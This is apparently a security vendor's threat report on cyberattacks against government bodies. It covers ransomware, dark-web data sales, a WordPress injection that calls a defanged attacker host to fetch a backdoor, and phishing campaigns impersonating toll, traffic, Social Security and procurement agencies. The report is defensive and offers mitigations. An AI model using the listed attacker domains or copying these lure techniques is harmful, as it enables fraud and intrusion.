Bolstering Cybersecurity Resilience in the Public Sector

With digital transformation continuing unabated, the prevalence of legacy systems, and the rising interconnectedness of complex systems and services, organizations in the public sector face a plethora of challenges and cyber risks.

In this article, which is part of a series of public sector blog series that tackle ransomware trends and dark web research pertaining to government entities, the Trustwave SpiderLabs team shines a spotlight on the various threats and risks affecting government organizations. This serves as an update to our 2024 Public Sector Threat Briefing.

This report covers the reasons why threat actors continue to target the public sector and provides insight into why the public sector is an attractive cybercriminal target. In addition, we provide several notable cybercriminal trends and threats we’ve observed in the first half of 2025, including malware attacks, phishing emails, and platform abuse.

Public Sector Attacks: A Brief Overview

In the past year, cyber threats targeting public administrations have intensified. Ransomware and extortion attacks continued to rise sharply, with over 117 US Federal and State government entities affected in 2024 alone. Ransomware-as-a-Service (RaaS) groups, expanded operations, often targeting third-party providers and leveraging new tactics such as data extortion without encryption.

Figure 1. Switzerland's public administration is believed to have become a victim of a ransomware attack.

The MOVEit and GoAnywhere breaches demonstrated the long-lasting impact of supply chain vulnerabilities, as sensitive data from government-linked organizations continued to surface. AI tools are now being used by attackers to craft more convincing phishing campaigns and evade detection, while deepfakes and voice impersonation have added a new layer of social engineering risk. Meanwhile, only a minority of public agencies currently assess the security of AI tools before adoption.

Figure 2. A governmental agency is suspected of being a victim of the latest SharePoint exploit usage.

New zero-day vulnerabilities, such as the 2025 Microsoft SharePoint and Citrix Bleed flaws, were exploited rapidly by state-linked groups, highlighting the shrinking time between disclosure and exploitation. The SharePoint campaign alone impacted multiple US federal agencies, underlining the urgency of faster vulnerability management.

While state-sponsored campaigns by China, Russia, and North Korea remained active, governments launched major initiatives: the US introduced its National Cybersecurity Strategy, the EU launched a joint cyber response unit, and NATO advanced its rapid cyber defense capabilities.

The Public Sector Attacks: Motivations and Value for Threat Actors

The public sector offers a rich and multifaceted target for cybercriminals, hacktivists, and nation-state actors alike. Unlike purely commercial sectors, public administrations manage an extensive mix of sensitive personal, operational, and strategic data, making them particularly attractive for various types of exploitation. Across nearly all divisions, attackers may pursue:

Figure 3. A threat actor introduces data obtained from governmental sources.

• Personally Identifiable Information (PII): Public agencies often maintain massive databases of residents and citizens, including names, addresses, Social Security numbers (SSNs), tax records, health data, and more. Threat actors can then sell this data on the dark web, used in fraud, or weaponize it in disinformation campaigns.

Figure 4. A threat actor offers data obtained from a claimed breach of the NY state website.

• Operational Disruption: Government agencies deliver essential services, from emergency response to water treatment to social aid. Disrupting these services via ransomware or distributed denial-of-service (DDoS) attacks not only garners ransom payments but also creates public fear and political pressure, particularly effective for ideologically or state-backed actors.
• Espionage and Surveillance: State-sponsored actors often seek access to internal communications, policy documents, or diplomatic files. Breaches can offer long-term insight into national strategies or decision-making processes.
• Credential and Infrastructure Access: Many public entities use legacy systems or third-party vendors, making them vulnerable to initial compromise and lateral movement into more sensitive networks. Compromised access may be sold or used to stage deeper attacks.
• Monetary Gain via Ransomware: With limited budgets and public accountability, public institutions are often underprepared for ransomware attacks. This makes them lucrative and less defended than private-sector firms of similar size.
• Political and Social Manipulation: Targeting public-facing systems, such as election infrastructure or public health databases, allows attackers to undermine trust in institutions and spread chaos.

Figure 5. A threat actor is advertising data claimed to have been obtained from a breach of the Dubai Municipality.

Each governmental branch handles distinct data types, system access levels, and operational roles and enabling attackers to customize their tactics and goals to exploit these specific characteristics.

Table 1.

The public sector is attacked not only for data or money but also for influence, intelligence, and leverage.

Figure 6. A threat actor leaks private files from the Argentinian police.

Each sub-division offers unique value to adversaries depending on their motivations, whether financial, political, or strategic.

Figure 7. A dark web forum advertisement offers the stolen data of 4.2 million people from Romania.

The diversity of services, systemic interconnectivity, and often underfunded cybersecurity teams make the public sector one of the most critical areas when it comes to defense and attacker interest.

Notable Trends in the Public Sector

From Trustwave’s global perspective, we’ve picked a few noteworthy trends that may be going under the radar for your security team.

Malware Attack on a Local Government Council

The Threat: In November 2024, we received a case from a local government council where a website had injected code linked to the Balada Injector campaign, a widespread threat known for targeting WordPress websites through cross-site scripting (XSS) vulnerabilities.

The infection was traced to the exploitation of a known XSS vulnerability within the Popup Builder plugin, a popular tool used on WordPress platforms. The attackers manipulated a custom event to inject JavaScript code during pop-up triggers.

The injected code contained Base64-encoded strings that, when decoded, revealed a callback URL (https://call[.]colorschemeas[.]com/2YYHm4). The script contacted this external server to download further malicious payloads and ultimately install a PHP-based backdoor. 

Figure 8. Balada Injector’s malicious obfuscated code injected into a website. The script contacts an external server and downloads additional malware.

Mitigations to Reduce Risk: Threat actors can use XSS attacks to trigger all sorts of actions on the victim system. To address this threat, public sector organizations must keep their CMS and webpage frameworks up-to-date. They should also remove unnecessary and unsupported products and services from the website. 

Callback Phishing-BEC Targeting the City’s Finance Department

The Threat: Callback phishing, also known as telephone-oriented attack delivery (TOAD), is a type of phishing attack where attackers trick targets into calling their contact phone number enclosed in the email. In 2024, SpiderLabs saw a 140% increase in the number of TOAD attacks. Recently, this technique has also been seen in several business email compromise (BEC) campaigns.

In the example below, spammers impersonated the finance employee of a local civil engineering company that works on government infrastructure projects. The attackers claimed to have changed their email address and phone number and requested some financial documents. The sender domain was newly created (it was made this year) and isn’t owned by the engineering company. The specified phone number isn’t listed on the company’s official website. The fraudsters were aiming to divert the victim to their fraudulent communication channels and eventually divert funds to their account, too.

Figure 9. BEC scam requesting a contact update, featuring a fraudulent phone number and email address.

Mitigations to Reduce Risk: To thwart callback phishing attacks, organizations in the public sector should have multilayered email security solutions and train employees to spot and report phishing emails.

Organizations should inform employees to be wary of unsolicited emails, even those sent from legitimate platforms. When employees receive emails that urge users to call a phone number immediately, they should be taught to instead look up the company’s contact information listed on its official website. Employees who decide to contact hotline numbers should also be warned about sharing sensitive or financial information over the phone.

Compromised Government Email Account Sends Out Phishing Emails

The Threat: An attacker used a compromised email account of a top-level government employee to deliver phishing emails. The messages claimed that the recipient has to review a document related to a government project by clicking the link in the message. Paired with the authority of the compromised email account, the phishing attack was very compelling.

The messages examined by SpiderLabs contained a link pointing to a malicious page hosted on either the Craft platform or Google Presentations. These intermediary pages embed either the actual phishing link or an additional redirector to further obscure the final destination.

Figure 10. A sample of an email with a Craft phishing link sent from a compromised government council address, requesting the recipient to review a supposed project document.

Figure 11. The threat actor’s reply to a recipient’s inquiry about the legitimacy of an earlier message, which contained a malicious Google Presentation link.

The redirector webpage hosted on the Craft platform matched the theme of the phishing email. The compromised email account owner’s name was used as the creator of the page, and a link to the supposed document for review was embedded on the page.

Figure 12. A Craft.me landing page accessed via the email link, displaying a fake Excel document image with an embedded phishing link.

The next-stage URL leads to a fake DocuSign site hosted on an open directory megarack[.]com. Once the user enters their email address and clicks on “VERIFY YOUR EMAIL,” they will be redirected to a Microsoft phishing page hosted on a newly registered domain. 

Figure 13. Phishing landing page impersonating DocuSign, prompting victims to enter an email address and then redirecting to a fake Microsoft login portal.

Compromised Indiana Government GovDelivery Accounts used in TxTag ‘Toll Charges’ Phishing Campaign

In May 2025, threat actors launched a phishing campaign impersonating TxTag, Texas’s electronic toll collection system, by sending emails claiming toll charges. The messages originated from compromised Indiana government accounts, including the Indiana Department of Local Government Finance, and were distributed through the GovDelivery platform.

Below is the phishing email that was sent and here is a link to the May 13, 2025, SpiderLabs post on X that discusses the incident.

Figure 14. A phishing email impersonating TxTag sent via the compromised GovDelivery account of the Indiana Department of Local Government Finance (DLGF).

Recipients were directed to newly registered look-alike domains hosting a fake TxTag page designed to harvest personal information, credit card data, and one-time passwords (OTPs). 

Mitigations to Reduce Risk: Account compromise can lead to identity theft, operational disruptions, and financial loss via malware distribution, and the launch of other cyberattacks.

If you notice any peculiar signs that point to your email account being compromised, such as being logged off from all your devices, receiving password reset notifications that you did not initiate, and seeing emails you don’t recognize appearing in your sent and deleted folders, immediately alert your company’s IT or Incident Response department. 

Phishing Campaigns Impersonating Transport, Traffic, and Social Security Administration Authorities 

The Threat: Phishing emails purporting to be from transport agencies use lures specific to that sector, such as driver’s license renewal, vehicle registration renewal, overdue toll fees, or traffic violation fines, to obtain sensitive and/or financial information. Scammers usually persuade a victim to act upon their email immediately to avoid paying an increased payment amount or penalty fee.

SpiderLabs also uncovered another impersonation campaign involving a phishing email purported to be from NZTA, one of New Zealand’s transportation governing bodies. The agency’s name is used in the From header; however, the sender’s email address is not related to the government agency. 

Figure 15. A fake vehicle registration renewal notice impersonating NZTA that includes a phishing link hosted on a compromised website.

The message mimics NZTA’s official vehicle renewal email notification. When victims click the “RENEW REGISTRATION NOW” button, they are redirected to a fake NZTA page hosted on a compromised site not associated to the New Zealand government. This fake page, in turn, is just a stager that automatically redirects to another site. 

Figure 16. The sequence of phishing landing pages mimicking TxTag, designed to steal personal and credit card information.

The email below was crafted to resemble an email alert from NaTIS, a South African government traffic information platform. The platform’s name and logo were used on the sender’s email address and message body, respectively.

Figure 17. Phishing email posing as a NaTIS traffic fine notification that contains a malicious link.

A traffic violation theme was used to entice the user to click the phishing link. The fake email claimed the recipient owes a traffic fine, which must be resolved immediately, or the traffic fine will be increased. Clicking the “Complete the update” button on the email leads the user to a site unrelated to NaTIS. The domain fixeguro[.]pt is an open directory domain, which was left publicly accessible, hence was abused by threat actors. 

Social Security Administration Impersonation: SSA is a US government agency that administers social programs, and is one of the entities in the public sector that has been actively impersonated in phishing campaigns since 2024. 

SVG Redirector Disguised as SSA Document: SpiderLabs reported that attacks using SVG image files have surged significantly in the first quarter of 2025. This has been reported in one of Trustwave SpiderLabs’ blogs, “Pixel-Perfect Trap: The Surge of SVG-Borne Phishing Attacks.”

The attachment on the email below, masked as an SSA benefit statement (SSA-1099,) is a small SVG file containing a redirection code. When the SVG file is opened, the user is led to a webpage unrelated to the SSA. The webpage was already inaccessible at the time this campaign was examined.

Figure 18. A phishing email impersonating the SSA that includes a lure for a tax document review. The malicious email contains a malicious SVG attachment that redirects to a phishing site when opened.

Phishing Link Spreads Malicious Copy of ScreenConnect: In the SSA-themed phishing email below, the sender claimed the recipient’s most recent financial record might be erroneous and must be verified by installing the “Social Security Screen Connect” program onto the recipient’s system. Once the user clicks the link in the email, a malicious copy of the ScreenConnect tool is installed onto the system.

Figure 19. A phishing email impersonating the SSA instructs the recipient to download an SSA program to fix a reported statement error. 

ScreenConnect is a remote desktop tool from ConnectWise and has been actively leveraged by threat actors since early 2024 because it is a suitable remote tool to send phishing emails. 

The phishing link leads to a page hosted on Cloudflare’s platform pages[.]dev. This page just redirects to a fake SSA site hosted on the newly registered domain ssahelpcentral[.]com[.]ru, named after the government agency being spoofed. 

Before the malicious ScreenConnect file is downloaded, the user’s network information, such as IP and country, are gathered using the service in https://ipapi[.]co, and is sent to the threat actors. 

Figure 20. Fake SSA landing pages that lead users to download a malicious ScreenConnect executable.

Mitigations to Reduce Risk: Threat actors are always exploring new methods to push out phishing campaigns, including impersonating. In these cases, they are banking on the authority and legitimacy of public sector organizations to trick victims into clicking on malicious links and unwittingly disclosing their sensitive information.

To counter phishing emails sent via compromised accounts, organizations should conduct regular phishing awareness training and phishing simulation exercises, empowering employees to successfully spot and report phishing emails.

DocuSign Platform Abused in State of Nevada Procurement Phishing

The Threat: Threat actors are still exploiting an old favorite, the DocuSign platform, to deliver phishing emails and host malicious content. Phishing emails were sent from legitimate DocuSign servers, with embedded links directing users to DocuSign-hosted pages.

In one example, the phishing email impersonated the Nevada State procurement department, falsely referring to a “Procurement Service” to enhance the note’s credibility and deceive recipients. The email was sent via DocuSign, from the account which the threat actor controlled — adm[.]customerservice[.]cc[@]hotmail[.]com. A DocuSign envelope for sharing the malicious document was created — the document State of Nevada.pdf was uploaded with a Needs to View action. The target victims were added as the recipients of this fake government document. 

Figure 21. A “Review Document” phishing email delivered via DocuSign, impersonating the State of Nevada’s procurement office.

Once the “REVIEW DOCUMENT” button is clicked, the user will be presented with a malicious document hosted on DocuSign. The document contains a BING redirect link. The attack ultimately sent users to a credential-harvesting site that employs an adversary-in-the-middle (AITM) Tycoon2FA phishing kit, enabling the bypass of multi-factor authentication (MFA) mechanisms. 

Figure 22. A genuine DocuSign page hosting a maliciously crafted document with a link that redirects to a phishing site through Bing.

Mitigations to Reduce Risk: To bypass email detection tools, threat actors abuse legitimate apps and services to distribute and host malicious payloads as well as redirect users to malicious pages and sites.

Public service organizations can benefit from multilayered email security platforms that effectively detect malicious URLs and attachments, hindering malicious emails from reaching users’ inboxes.

Conclusion

If the threats and risks we highlighted in this report are any indication, the public sector will continue to face increasingly complex and covert attacks. To keep the public sector secure, security professionals must adopt a multilayered approach to cybersecurity, implementing hardening standards, keeping their asset inventory up-to-date, and following applicable security recommendations. By doing so, public sector organizations can safeguard data privacy, business continuity, and public trust.